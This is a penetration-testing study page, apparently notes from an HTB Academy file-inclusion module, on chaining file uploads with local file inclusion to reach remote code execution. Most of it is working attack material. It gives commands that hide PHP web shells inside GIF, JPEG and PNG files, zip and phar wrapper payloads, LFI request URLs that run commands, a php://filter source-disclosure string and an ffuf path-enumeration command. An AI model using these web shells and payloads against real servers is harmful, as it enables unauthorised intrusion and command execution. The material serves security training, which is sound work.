File Upload + LFI

Overview

Combining file upload vulnerabilities with LFI creates powerful attack vectors for achieving RCE when direct wrappers are not available.

Attack Flow:

Upload malicious file disguised as legitimate content
Discover upload location via directory traversal or source disclosure
Include uploaded file via LFI vulnerability
Execute embedded code and achieve RCE

Method 1: Malicious Image Upload

Technique: PHP in Image Files

Step 1: Create Malicious Image

# GIF header with embedded PHP
echo 'GIF89a<?php system($_GET["cmd"]); ?>' > shell.gif

# JPEG with PHP payload
echo -e '\xFF\xD8\xFF\xE0<?php system($_GET["cmd"]); ?>' > shell.jpg

# PNG with embedded shell
cp legitimate.png shell.png
echo '<?php system($_GET["cmd"]); ?>' >> shell.png

Step 2: Upload via Web Interface

Upload through file upload forms
Bypass extension filters
Discover upload directory location

Step 3: Execute via LFI

# Include uploaded image as PHP
http://target.com/lfi.php?file=../../../../var/www/uploads/shell.gif&cmd=id

Method 2: Zip Wrapper Technique

Creating Zip-based Payloads

Step 1: Create PHP Shell

echo '<?php system($_GET["cmd"]); ?>' > shell.php
zip shell.zip shell.php
mv shell.zip shell.jpg  # Disguise as image

Step 2: Upload and Execute

# Upload disguised zip file
# Then include via zip wrapper
http://target.com/lfi.php?file=zip://path/to/shell.jpg%23shell.php&cmd=whoami

Method 3: Phar Wrapper Technique

PHAR Archive Exploitation

Step 1: Create PHAR Archive

<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');
$phar->stopBuffering();
?>

Step 2: Execute via PHAR Wrapper

# Include PHAR content
http://target.com/lfi.php?file=phar://uploads/shell.jpg/shell.txt&cmd=id

Upload Location Discovery

Common Upload Directories

/var/www/html/uploads/
/var/www/html/files/
/var/www/html/images/
/tmp/
./uploads/
../uploads/

Discovery Techniques

# Source code disclosure for paths
php://filter/convert.base64-encode/resource=upload.php

# Directory traversal enumeration
ffuf -w directories.txt:FUZZ -u "http://target.com/lfi.php?file=FUZZ/shell.gif"

[Content continues with more detailed techniques...]

This guide covers file upload + LFI combination techniques from HTB Academy's File Inclusion module.

PreviousRemote File Inclusion (RFI)NextLog Poisoning Techniques

Last updated 6 months ago

hashtagOverview

hashtagMethod 1: Malicious Image Upload

hashtagTechnique: PHP in Image Files

hashtagMethod 2: Zip Wrapper Technique

hashtagCreating Zip-based Payloads

hashtagMethod 3: Phar Wrapper Technique

hashtagPHAR Archive Exploitation

hashtagUpload Location Discovery

hashtagCommon Upload Directories

hashtagDiscovery Techniques